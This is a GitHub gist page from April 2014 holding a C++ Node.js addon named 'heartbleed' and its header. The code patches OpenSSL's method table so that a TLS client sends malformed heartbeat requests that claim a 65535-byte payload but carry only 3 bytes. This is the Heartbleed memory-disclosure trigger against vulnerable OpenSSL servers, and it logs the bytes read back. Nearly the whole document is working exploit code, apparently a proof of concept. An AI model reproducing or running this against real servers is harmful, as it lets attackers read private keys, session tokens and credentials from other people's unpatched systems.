Skip to content

Instantly share code, notes, and snippets.

@indutny indutny/heartbleed.cc Secret
Created Apr 16, 2014

Embed
What would you like to do?
#include "heartbleed.h"
#include "openssl/err.h"
namespace heartbleed {
using namespace node;
using namespace v8;
template <MethodFunction M>
CtrlFunction SSLWrapper<M>::ssl_ctrl_;
template <MethodFunction M>
ReadBytesFunction SSLWrapper<M>::ssl_read_;
template <MethodFunction M>
SSLWrapper<M>::SSLWrapper() {
ssl_ctrl_ = M()->ssl_ctrl;
ssl_read_ = M()->ssl_read_bytes;
const_cast<SSL_METHOD*>(M())->ssl_ctrl = Ctrl;
const_cast<SSL_METHOD*>(M())->ssl_read_bytes = ReadBytes;
/*
method->ssl_read_bytes =;
+ s2n(fake, p);
+ ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3);
*/
}
template <MethodFunction M>
long SSLWrapper<M>::Ctrl(SSL* s, int cmd, long larg, void* parg) {
if (cmd != SSL_CTRL_GET_SESSION_REUSED)
return ssl_ctrl_(s, cmd, larg, parg);
// Faking out get session reused,
void* buf = OPENSSL_malloc(3);
uint16_t size = 65535;
reinterpret_cast<uint8_t*>(buf)[0] = TLS1_HB_REQUEST;
reinterpret_cast<uint8_t*>(buf)[1] = size >> 8;
reinterpret_cast<uint8_t*>(buf)[2] = (size & 0xff) | 1;
fprintf(stdout, "sent %d\n", size);
M()->ssl_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3);
return 0;
}
template <MethodFunction M>
int SSLWrapper<M>::ReadBytes(SSL* s,
int type,
unsigned char* buf,
int len,
int peek) {
fprintf(stdout, "%d: %d %d %d %d <- %d\n", s->rstate, buf[0], buf[1], buf[2], buf[3], len);
return ssl_read_(s, type, buf, len, peek);
}
template <MethodFunction M>
void SSLWrapper<M>::ProcessHeartbeat(SSL* ssl) {
fprintf(stdout, "got\n");
}
static SSLWrapper<TLSv1_method> t1;
static SSLWrapper<TLSv1_client_method> t1_client;
static SSLWrapper<TLSv1_1_method> t11;
static SSLWrapper<TLSv1_1_client_method> t11_client;
static SSLWrapper<TLSv1_2_method> t12;
static SSLWrapper<TLSv1_2_client_method> t12_client;
static void Initialize(Handle<Object> target) {
}
} // namespace heartbleed
NODE_MODULE(heartbleed, heartbleed::Initialize);
#include "node.h"
#include "v8.h"
#include "openssl/ssl.h"
namespace heartbleed {
typedef const SSL_METHOD* (*MethodFunction)(void);
typedef long (*CtrlFunction)(SSL*, int, long, void*);
typedef int (*ReadBytesFunction)(SSL*, int, unsigned char*, int, int);
template <MethodFunction M>
class SSLWrapper {
public:
SSLWrapper();
protected:
static long Ctrl(SSL* s, int cmd, long larg, void* parg);
static int ReadBytes(SSL* s, int type, unsigned char* buf, int len, int peek);
static void ProcessHeartbeat(SSL* ssl);
static CtrlFunction ssl_ctrl_;
static ReadBytesFunction ssl_read_;
};
} // namespace heartbleed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.